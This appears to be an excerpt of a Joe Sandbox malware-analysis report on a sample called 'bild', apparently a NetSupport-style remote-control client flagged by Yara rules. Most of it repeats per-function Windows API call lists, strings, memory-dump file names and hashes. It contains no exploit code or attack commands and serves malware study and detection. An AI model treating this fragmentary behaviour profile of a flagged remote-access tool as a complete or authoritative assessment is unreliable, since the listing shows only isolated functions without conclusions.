                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                    • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                    • API String ID: 1092798621-1973987134
                                                                                    • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                    • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                    • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                    • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                    APIs
                                                                                      • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                      • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                      • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                    • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                    • _calloc.LIBCMT ref: 1112B3AD
                                                                                    • _free.LIBCMT ref: 1112B44B
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                    • String ID: ntohl$ws2_32.dll
                                                                                    • API String ID: 2881363997-4165132517
                                                                                    • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                    • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                    • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                    • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 2427920155-3145022300
                                                                                    • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                    • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                    • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                    • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 11105531
                                                                                    • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                    • GetTickCount.KERNEL32 ref: 1110554E
                                                                                    • GetTickCount.KERNEL32 ref: 111055EB
                                                                                    • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                    Strings
                                                                                    • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                    • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                    • API String ID: 956672424-625438208
                                                                                    • Opcode ID: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                    • Instruction ID: 36f89d150e27e685f8f970f5604c93a837ba150e33a3fa1efe54dd65d22fc2b8
                                                                                    • Opcode Fuzzy Hash: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                    • Instruction Fuzzy Hash: BA310475D042999FE315CF64C984F5AFBE6EB08328F154265E866EB290D731EC00CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeStringUninitializeW@16
                                                                                    • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                    • API String ID: 1826621714-1320232752
                                                                                    • Opcode ID: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                    • Instruction ID: ec2d2041e6adeb1d612fb4c2d78acfda5a53ba2d11cec2f487d5e4dde2f70ea0
                                                                                    • Opcode Fuzzy Hash: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                    • Instruction Fuzzy Hash: BE317075A0061A9BDB24DF54CD457EAB3B8EF08315F0040E9E909AB244EB75FA84CF50
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                    • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                    • API String ID: 1318148156-3179819359
                                                                                    • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                    • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                    • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                    • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                    APIs
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                    • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                    • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                    • API String ID: 3960414890-2201682149
                                                                                    • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                    • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                    • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                    • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                    APIs
                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                    • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                    • API String ID: 468487828-934300333
                                                                                    • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                    • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                    • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                    • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                    APIs
                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032C3
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 110032E7
                                                                                    • DestroyMenu.USER32(00000000), ref: 110032F9
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                    • API String ID: 4241058051-934300333
                                                                                    • Opcode ID: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                    • Instruction ID: ea916ae31ccda8615c5aa97c2145fcab3b24ed556d1c3993920dd856584db00e
                                                                                    • Opcode Fuzzy Hash: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                    • Instruction Fuzzy Hash: F8F02E3EE945BA73D31266F53C0DF8BFA584F526ACB060030F434FA645EE14A40081A6
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                    • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                    • GetCursorPos.USER32(?), ref: 111192A1
                                                                                    • GetTickCount.KERNEL32 ref: 111192B6
                                                                                    • GetTickCount.KERNEL32 ref: 11119337
                                                                                    • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                    • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                    • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4245181967-0
                                                                                    • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                    • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                    • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                    • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                    APIs
                                                                                    • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                    • _strncat.LIBCMT ref: 1102518B
                                                                                    • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                    • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                    • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                    • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                    • SetFocus.USER32(?), ref: 11025265
                                                                                      • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                     • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                     • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
